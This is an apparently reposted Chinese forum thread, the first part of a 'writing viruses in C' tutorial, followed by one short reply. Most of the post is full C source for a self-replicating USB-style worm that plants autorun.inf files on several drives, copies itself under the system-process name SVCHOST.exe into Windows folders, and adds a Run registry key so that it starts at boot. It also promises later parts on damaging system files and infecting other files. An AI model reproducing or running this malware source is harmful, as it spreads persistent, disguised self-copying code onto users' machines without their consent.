我来我网
https://5come5.cn
 
您尚未 登录  注册 | 菠菜 | 软件站 | 音乐站 | 邮箱1 | 邮箱2 | 风格选择 | 更多 » 
 

本页主题: 用C语言写病毒(1) 显示签名 | 打印 | 加为IE收藏 | 收藏主题 | 上一主题 | 下一主题

ljpdxj



性别: 帅哥 状态: 该用户目前不在线
等级: 栋梁之材
发贴: 687
威望: 0
浮云: 1108
在线等级:
注册时间: 2006-02-28
最后登陆: 2008-06-29

5come5帮你背单词 [ conquest /'koŋkwest/ n. 攻取,征服 ]


用C语言写病毒(1)

[转]用C语言写病毒(1)

转载,看蝈蝈们有否兴趣研究


前4期链接,请点击:
第一期,最简单的exe病毒(TC编译通过):

第二期,一个完整病毒示例(DEV-CPP工程下 GCC编译通过):

第三期,编程技术和病毒原理(1)--注册表:

第四期,DLL病毒
http://www.bc-cn.net/Article/kfyy/cyy/jszl/200706/4589.html



原帖及讨论:http://bbs.bc-cn.net/dispbbs.asp?BoardID=5&ID=142740

连载1,由于本人较忙,连载2可能在8月左右或8月前与大家见面

本连载文章只讨论写病毒的技术,并不讨论危害计算机及网络,所示例的程序只是一个无危害的模板,你

可以在技术范围及法律范围内扩充实验.
在读本程序前请保证不用此程序进行违法活动,否则,请马上离开.

连载1——最基本的病毒.
本病毒的功能:
1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe,使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.病毒在执行后具有相联复制能力

本病毒类似普通U盘病毒雏形,具备自我复制、运行能力。

以下程序在DEV-CPP 4.9.9.2(GCC编译器)下编译通过
请保存为SVCHOST.C编译,运行,本病毒对计算机无危害,请放心研究

Copy code
/* SVCHOST.C  */
/* SVCHOST.EXE */

#define SVCHOST_NUM 6
#include<stdio.h>
#include<string.h>

char *autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};

char *files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"};

char *files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",
"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",
"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"};

char *regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";

int copy(char *infile,char *outfile)
{
    FILE *input,*output;
    char temp;
    if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen(outfile,"wb"))!=NULL))
        {
            while(!feof(input))
              {
                  fread(&temp,1,1,input);
                  fwrite(&temp,1,1,output);
              }
          fclose(input);
          fclose(output);
          return 0;
      }
    else return 1;
}
int main(void)
{
    FILE *input,*output;
    int i,k;
    for(i=0;i<3;i++)
    {
      output=fopen(files_autorun[i],"w");
      fprintf(output,"%s",autorun);
      fclose(output);
    }
    for(i=0;i<=SVCHOST_NUM;i++)
    {
      if((input=fopen(files_svchost[i],"rb"))!=NULL)
      {
        fclose(input);
        for(k=0;k<SVCHOST_NUM;k++)
        {
          copy(files_svchost[i],files_svchost[k]);
        }
        i=SVCHOST_NUM+1;
      }
    }
    system(regadd); /* 注册SVCHOST.exe,让其在启动时运行 */
    return 0;
}



在连载2中你将看到:
病毒对系统文件破坏的方法,病毒对文件的感染,病毒生成垃圾文件,病毒更具隐蔽性的方法。


[ 此帖被ljpdxj在2007-12-15 11:14重新编辑 ]
本帖最近评分记录:
  • 浮云:10(est) 优秀转贴
  • 顶端 Posted: 2007-12-14 22:14 | [楼 主]
    光子vs电子



    性别: 帅哥 状态: 该用户目前不在线
    头衔: 程序小白
    等级: 人见人爱
    家族: YD一族
    发贴: 3379
    威望: 0
    浮云: 0
    在线等级:
    注册时间: 2007-04-29
    最后登陆: 2022-12-09

    5come5帮你背单词 [ busy /'bizi/ a. 忙的,忙碌的,热闹的,繁忙的,(电话)占线 ]


    连个注释都没的
    顶端 Posted: 2007-12-14 22:40 | [1 楼]
    我来我网·5come5 Forum » 程序员之家

    Total 0.011080(s) query 6, Time now is:11-22 23:22, Gzip enabled
    Powered by PHPWind v5.3, Localized by 5come5 Tech Team, 黔ICP备16009856号